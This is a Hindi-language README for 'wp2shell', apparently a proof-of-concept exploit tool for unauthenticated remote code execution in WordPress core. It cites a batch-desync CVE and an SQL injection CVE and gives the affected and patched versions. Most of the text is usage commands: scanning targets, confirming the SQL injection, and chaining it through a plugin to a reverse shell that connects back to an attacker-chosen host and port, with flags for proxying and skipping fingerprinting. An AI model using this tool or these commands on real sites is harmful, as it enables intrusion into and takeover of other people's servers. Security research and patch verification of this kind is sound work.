
WP2Shell के नाम से ज्ञात WordPress कोर अनप्रमाणित RCE का PoC शोषण
| नाम | wp2shell |
| सीवीई | CVE-2026-63030 (batch desync), CVE-2026-60137 (author__not_in SQLi) |
| प्रभावित | WordPress 6.9.0 to 6.9.4, 7.0.0 to 7.0.1 |
| समाधान | 6.9.5, 7.0.2 |
| प्रमाणीकरण आवश्यक | कोई नहीं |
| द्वारा खोजा गया | Adam Kues (Searchlight Cyber / Assetnote) |
बेयर होस्ट = ऑटो स्कीम (https:// फिर http:// कोशिश करता है)। केवल तभी http:// या https:// उपसर्ग जोड़ें जब आप किसी एक को बाध्य करना चाहते हैं।
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080
# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/
# timing confirm
wp2shell target.example --confirm-sqli
# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443
| फ़्लैग | यह क्या करता है |
|---|---|
--shell [LHOST [LPORT]] | सामान्य RCE श्रृंखला; डिफ़ॉल्ट LHOST इस मशीन का IP है, LPORT 443 है |
--rest-route | पहले /?rest_route=/batch/v1 पर कोशिश करें |
--verify-tls | TLS प्रमाणपत्र सत्यापित करें (प्रयोगशाला/स्व-हस्ताक्षरित के लिए डिफ़ॉल्ट रूप से बंद) |
--proxy URL | ट्रैफ़िक को प्रॉक्सी के माध्यम से भेजें |
--force | WordPress फिंगरप्रिंटिंग को छोड़ें |